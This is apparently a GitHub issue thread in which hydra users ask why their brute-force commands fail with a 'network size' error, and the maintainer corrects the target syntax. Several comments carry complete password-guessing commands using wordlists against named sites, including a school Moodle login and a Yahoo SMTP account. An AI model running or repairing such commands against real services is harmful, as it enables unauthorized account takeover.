### ISSUE TITLE
Error: network size may only be between /16 and /31

### ISSUE THREAD

**Issue by stevermeister** [vanhauser-thc/thc-hydra#96]
It's not very clear what this error means.

my command

    hydra  -l admin -P passwords.txt https://www.somesite.com https-post-form "/admin/login.php:parent%5Buname%5D=^USER^&parent%5Bpassword%5D=^PASS^:&_adminLogin=YES&SAVE=Login"

**Comment by vanhauser-thc** [comment]
it means you are using the command line wrong :)

hydra  -l admin -P passwords.txt www.somesite.com https-post-form "/admin/login.php:parent%5Buname%5D=^USER^&parent%5Bpassword%5D=^PASS^:&_adminLogin=YES&SAVE=Login"

**Comment by stevermeister** [comment]
@vanhauser-thc thank you for your quick feedback!

**Comment by sehs1418** [comment]
same problem

**Comment by gwibard** [comment]
I am having the same problem my command is:
hydra -L /root/Downloads/names -P /root/Downloads/rockyou.txt www.vle.handsworth.bham.sch.uk/moodle/login/index.php http-post-form "/moodle/login/index.php:username=^USER^&password=^PASS^:Invalid"

Then this comes:
Error: network size may only be between /16 and /31 : www.vle.handsworth.bham.sch.uk/moodle/login/index.php

(I had permission to test it on this website)

**Comment by vanhauser-thc** [comment]
Do you have the newest version?

**Comment by gwibard** [comment]
I fixed it by changing bits of the code and the code that worked at the end was:
hydra -L /root/Downloads/names -P /root/Downloads/rockyou.txt vle.handsworth.bham.sch.uk http-form-post "/moodle/login/index.php:username=^USER^&password=^PASS^:Invalid"
Thank you for replying.

**Comment by vanhauser-thc** [comment]
ah, now I see it, your command line was wrong :)

**Comment by bhuwan1004** [comment]
Error: network size may only be between /16 and /31:       by hydra what is the problem

**Comment by bhuwan1004** [comment]
hydra -l bhuwan_patidar -P /root/Desktop/rockyou.txt -e s -f www.ubrain.com/login http-post-form "/moodle/login/index.php:username=^USER^&password=^PASS^:Invalid"
   
having =Error: network size may only be between /16 and /31: by hydra what is the problem

**Comment by vanhauser-thc** [comment]
remove /login from the host

**Comment by ujbolivar** [comment]
Can anyone help me with my command line?

hydra challenges.hackrocks.com/the-chattering-programmer/ -L /home/kali/Desktop/userList -P /home/kali/Desktop/passwordList -f https-get /hackme

**Comment by spawn115** [comment]
I'm having this issue as well but I don't know what the issue is in my command line 

Hydra -S -l example@yahoo.com -P /home/kali/Desktop/"passwordlist" -v -V -e nsr -s 487 smtp/mail.yahoo smtp

**Comment by vanhauser-thc** [comment]
...  -s 487 smtp::/mail.yahoo.com

**Comment by spawn115** [comment]
> ... -s 487 smtp::/mail.yahoo.com

I tried it using smtp::/ and not it prompts for dquote and I still get the same error the only fix I found is to write it smtp.mail.yahoo.com

**Comment by vanhauser-thc** [comment]
sorry my bad, typo, smtp://mail.... like it is seen in the help output and documentation

**Comment by Jimmyoncrack** [comment]
Hello, I'm having the same issue, ill write the exact things i did.
First, I did cd/usr/share/wordlists
second I did sudo hydra -l "34537" -P rockyou.txt nonononono.nonononono.org/nono/nono/nono/nono.jsp ssh -t 4
(nonos are to protect my identity as it states an approximate location of where I live.
the error message says "Error: network size may only be between /16 and /31: nonononono.nonononono.org/nono/nono/nono/nono.jsp
Please help, I've tried to fix it for a while and couldn't find a solution.

**Comment by Pedroauler** [comment]
Hi i'm having the same issue
:hydra -L unicos.txt -p admin 10.10.144.112/ http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F10.10.144.112%2Fwp-admin%2F&testcookie=1:Invalid username" -F -V  
Hydra v9.2 (c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-06-04 18:14:17
Error: network size may only be between /16 and /31: 10.10.144.112/

**Comment by BaByingo123** [comment]
> 
You can try only use 10.10.144.112 instead of 10.10.144.112/

**Comment by Alo0ne** [comment]
Hi, why my code dont work? error: Error: network size may only be between /16 and /31: 192.168.44.136/mutillidae/index.php?page=login.php

hydra -l admin -P diccionariocrunch.txt 192.168.44.136/mutillidae/index.php?page=login.php http-post-form '/login.php:username=^USER^&password=^PASS^:S=invalid'

**Comment by TheDark434** [comment]
> It's not very clear what this error means.
> 
> my command
> 
> ```
> hydra  -l admin -P passwords.txt https://www.somesite.com https-post-form "/admin/login.php:parent%5Buname%5D=^USER^&parent%5Bpassword%5D=^PASS^:&_adminLogin=YES&SAVE=Login"
> ```



> it means you are using the command line wrong :)
> 
> hydra -l admin -P passwords.txt [www.somesite.com](http://www.somesite.com) https-post-form "/admin/login.php:parent%5Buname%5D=^USER^&parent%5Bpassword%5D=^PASS^:&_adminLogin=YES&SAVE=Login"

I have done this and now it is showing every passwords as the correct one every single time i run the command.

plz help!

**Comment by Spiksee3** [comment]
getting the same error 
my code:

sudo hydra -L /home/spark/Downloads/usernames.txt -P /home/spark/Downloads/rockyou-75.txt -u -f www.this.web.site/login.php https-post-form "/login.php:userid=^USER^&password=^PASS^:F=<form name='logonForm'"

when i run it i get

Error: network size may only be between /16 and /31: www.this.web.site/login.php
